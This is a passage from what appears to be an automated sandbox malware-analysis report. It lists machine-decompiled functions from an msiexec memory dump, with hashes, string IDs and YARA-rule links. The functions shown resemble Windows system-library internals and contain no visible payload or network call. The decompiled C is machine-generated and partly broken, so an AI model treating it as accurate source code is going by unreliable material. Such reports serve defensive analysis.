					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04D24620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04D49650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                              0x04d83893
                              0x04d83896
                              0x04d83899
                              0x04d8389f
                              0x04d838a0
                              0x04d838a4
                              0x04d838a9
                              0x04d838ac
                              0x04d838ad
                              0x04d838ae
                              0x04d838af
                              0x04d838b1
                              0x04d838b4
                              0x04d838bb
                              0x04d838bc
                              0x04d838bd
                              0x04d838c4
                              0x04d838c8
                              0x04d838ca
                              0x04d838ca
                              0x04d838d5
                              0x04d8393e
                              0x04d83940
                              0x04d83942
                              0x04d83952
                              0x04d83954
                              0x04d83961
                              0x04d83961
                              0x04d83967
                              0x04d8396e
                              0x04d8396e
                              0x04d83947
                              0x04d8394c
                              0x00000000
                              0x04d8394c
                              0x04d838ea
                              0x04d838ee
                              0x04d838f8
                              0x04d838f9
                              0x04d838ff
                              0x04d83900
                              0x04d83902
                              0x04d83903
                              0x04d8390b
                              0x04d8390f
                              0x04d83950
                              0x00000000
                              0x04d83950
                              0x04d83915
                              0x04d8391d
                              0x04d8391d
                              0x04d83922
                              0x04d83926
                              0x00000000
                              0x04d83928
                              0x04d8392b
                              0x04d8392b
                              0x04d83935
                              0x04d83937
                              0x04d83937
                              0x00000000
                              0x04d83935
                              0x04d83926
                              0x04d838f0
                              0x00000000

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryName
                              • API String ID: 0-215506332
                              • Opcode ID: 56f6195389173dcc1624995596d39517b95c93f8d6527aeca20492d755f5fcde
                              • Instruction ID: cd133bc96fb0179d20f68ebcf49a888683c83971c1cdaa94528dab3de76dbd9d
                              • Opcode Fuzzy Hash: 56f6195389173dcc1624995596d39517b95c93f8d6527aeca20492d755f5fcde
                              • Instruction Fuzzy Hash: CA31E272A00619AFEB25FA59C945D7FB774FB81B20F01416DEC19A7640E632AE00CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D3D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                              Download Yara Rule
                              C-Code - Quality: 33%
                              			E04D3D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4dfd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04D24120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04D4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04D498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04D495D0();
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                              0x04d3d29c
                              0x04d3d2a6
                              0x04d3d2b1
                              0x04d3d2b5
                              0x04d3d2b6
                              0x04d3d2bc
                              0x04d3d2bd
                              0x04d3d2be
                              0x04d3d2bf
                              0x04d3d2c2
                              0x04d3d2c4
                              0x04d3d2cc
                              0x04d3d384
                              0x04d3d34b
                              0x04d3d34f
                              0x04d3d350
                              0x04d3d351
                              0x04d3d35c
                              0x04d3d35c
                              0x04d3d2d6
                              0x04d3d2da
                              0x04d3d2e1
                              0x04d3d361
                              0x04d3d369
                              0x04d3d36d
                              0x04d3d2e3
                              0x04d3d2e3
                              0x04d3d2e3
                              0x04d3d2e5
                              0x04d3d2ed
                              0x04d3d2f5
                              0x04d3d2fa
                              0x04d3d302
                              0x04d3d303
                              0x04d3d30b
                              0x04d3d30f
                              0x04d3d313
                              0x04d3d318
                              0x04d3d31c
                              0x04d3d320
                              0x04d3d379
                              0x04d3d37d
                              0x00000000
                              0x00000000
                              0x04d7affe
                              0x04d7b001
                              0x04d7b011
                              0x00000000
                              0x04d3d322
                              0x04d3d322
                              0x04d3d330
                              0x04d3d337
                              0x04d3d35d
                              0x04d3d339
                              0x04d3d33f
                              0x04d3d38c
                              0x04d3d38c
                              0x04d3d33f
                              0x04d3d349
                              0x00000000
                              0x04d3d349

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: bd591c1e66784f261c5e243bc6acf8bca6aa59e946b56bdb84ce299e9471414f
                              • Instruction ID: a06febc7f5a2d77fa573c99c4ee8799457bf627c5ee00c681de838cf9aa88661
                              • Opcode Fuzzy Hash: bd591c1e66784f261c5e243bc6acf8bca6aa59e946b56bdb84ce299e9471414f
                              • Instruction Fuzzy Hash: 7231A4B16083459FD721DF28C98096BBBE9FBD5754F00092EF99593210E638ED08DFA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D11B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                              Download Yara Rule
                              C-Code - Quality: 72%
                              			E04D11B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04D4BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04D4A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04D4A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04D24620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                              0x04d11b8f
                              0x04d11b9a
                              0x04d11b9c
                              0x04d11b9e
                              0x04d11ba3
                              0x04d67010
                              0x04d67010
                              0x00000000
                              0x04d11ba9
                              0x04d11ba9
                              0x04d11bae
                              0x00000000
                              0x04d11bc5
                              0x04d11bca
                              0x04d11bcf
                              0x04d11bd0
                              0x04d11bd1
                              0x04d11bd2
                              0x04d11bd6
                              0x04d11bdc
                              0x04d11be0
                              0x04d66ffc
                              0x04d67000
                              0x00000000
                              0x04d67006
                              0x04d67009
                              0x04d67009
                              0x04d11be6
                              0x04d11bec
                              0x04d11c0b
                              0x04d11c0b
                              0x04d11c0c
                              0x04d11c11
                              0x04d11c12
                              0x04d11c15
                              0x04d11c1b
                              0x04d11c1f
                              0x04d11c31
                              0x04d11c33
                              0x04d67026
                              0x04d67026
                              0x04d11c21
                              0x04d11c24
                              0x04d11c24
                              0x04d11bee
                              0x04d11bee
                              0x04d11bf2
                              0x04d11c3a
                              0x04d11bf4
                              0x04d11bf4
                              0x04d11c05
                              0x04d11c05
                              0x04d11c09
                              0x04d11c3e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d11c09
                              0x04d11bec
                              0x04d11be0
                              0x04d11bae
                              0x04d11c2e

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: WindowsExcludedProcs
                              • API String ID: 0-3583428290
                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                              • Instruction ID: 65c852dd43024bdaec5bdf675a2f296e66a08cfa59c347fe2e5e34d869dd1ce0
                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                              • Instruction Fuzzy Hash: C421D336700268BBDB229ED59940F5FB7BAFB89754F094426EE059B214E630F90097B0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D2F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E04D2F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                              0x04d2f71d
                              0x04d2f722
                              0x04d2f726
                              0x04d74770
                              0x04d2f765
                              0x04d2f769
                              0x04d2f769
                              0x04d2f732
                              0x04d7477a
                              0x00000000
                              0x04d7477a
                              0x04d2f738
                              0x04d2f73a
                              0x04d2f73c
                              0x04d2f73f
                              0x04d2f746
                              0x04d2f778
                              0x04d2f7a9
                              0x04d2f7a9
                              0x04d2f754
                              0x04d2f75a
                              0x04d2f75d
                              0x04d2f75f
                              0x04d2f761
                              0x04d2f76f
                              0x04d2f771
                              0x04d2f771
                              0x04d2f76f
                              0x04d2f763
                              0x00000000
                              0x04d2f763
                              0x04d2f77d
                              0x04d2f7a3
                              0x04d2f7a5
                              0x00000000
                              0x04d2f7a5
                              0x04d2f77f
                              0x04d2f782
                              0x04d2f784
                              0x04d2f786
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d2f788
                              0x04d2f748
                              0x04d2f74d
                              0x04d2f78d
                              0x04d2f793
                              0x04d2f7b7
                              0x04d2f7bc
                              0x00000000
                              0x04d2f7bc
                              0x04d2f798
                              0x00000000
                              0x00000000
                              0x04d2f79d
                              0x04d2f7b0
                              0x00000000
                              0x04d2f7b0
                              0x04d2f79f
                              0x00000000
                              0x04d2f74f
                              0x04d2f74f
                              0x00000000
                              0x04d2f74f

                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Actx
                              • API String ID: 0-89312691
                              • Opcode ID: b6866f1667432ebb65c85b121cafd2247d02762022c1bdd6d79b26bfa9b8c9c0
                              • Instruction ID: 36ea32cb8681930560952069e0c734c40edffa0f63e6cea70a16fb4465db64bc
                              • Opcode Fuzzy Hash: b6866f1667432ebb65c85b121cafd2247d02762022c1bdd6d79b26bfa9b8c9c0
                              • Instruction Fuzzy Hash: F11181353046228BE7254F1D879063672B5FBA572CF244D3EE8A1CB391E670F841B340
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DB8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                              Download Yara Rule
                              C-Code - Quality: 71%
                              			E04DB8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4de0d50);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04D95720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04D5DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04D5DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04D5D130(_t34, _t39, _t40);
			}





                              0x04db8df1
                              0x04db8df1
                              0x04db8df1
                              0x04db8df1
                              0x04db8df1
                              0x04db8df1
                              0x04db8df3
                              0x04db8df8
                              0x04db8dfd
                              0x04db8e00
                              0x04db8e0e
                              0x04db8e2a
                              0x04db8e36
                              0x04db8e38
                              0x04db8e3c
                              0x04db8e46
                              0x04db8e46
                              0x04db8e36
                              0x04db8e50
                              0x04db8e56
                              0x04db8e59
                              0x04db8e5c
                              0x04db8e60
                              0x04db8e67
                              0x04db8e6d
                              0x04db8e73
                              0x04db8e74
                              0x04db8eb1
                              0x04db8ebd

                              Strings
                              • Critical error detected %lx, xrefs: 04DB8E21
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: Critical error detected %lx
                              • API String ID: 0-802127002
                              • Opcode ID: 48ccdcd5eeeb1f9a62f8f38befb6bfe4e783f6b6532e702fa9917402b67a9372
                              • Instruction ID: c42cf670e8a51704f40a0887259b140085b359756116d76877e18aa5addf7d47
                              • Opcode Fuzzy Hash: 48ccdcd5eeeb1f9a62f8f38befb6bfe4e783f6b6532e702fa9917402b67a9372
                              • Instruction Fuzzy Hash: 4411CB71E00308DBEF25EFA888057DCBBB5FB04704F24822DE4AAAB291C7316601DF24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D9FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                              Download Yara Rule
                              Strings
                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04D9FF60
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                              • API String ID: 0-1911121157
                              • Opcode ID: ad4e8953a9ddf0515da04e304e152e3161058ab6631b7664bd2dc6fb60419e48
                              • Instruction ID: fdb4579dc43eb9f424e3c61363e23319fbd6c3173cd0c50774d6fb489bca8b5e
                              • Opcode Fuzzy Hash: ad4e8953a9ddf0515da04e304e152e3161058ab6631b7664bd2dc6fb60419e48
                              • Instruction Fuzzy Hash: F6118E71610144AFEF22EF50C948F9877F2FB04709F158059E608972A1C739BD44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD5BA5 Relevance: .6, Instructions: 592COMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E04DD5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4de1178);
				E04D5D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04DD4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04D4D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04DD5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4df60e8;
								if( *0x4df60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4df60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04D49710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04D46DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
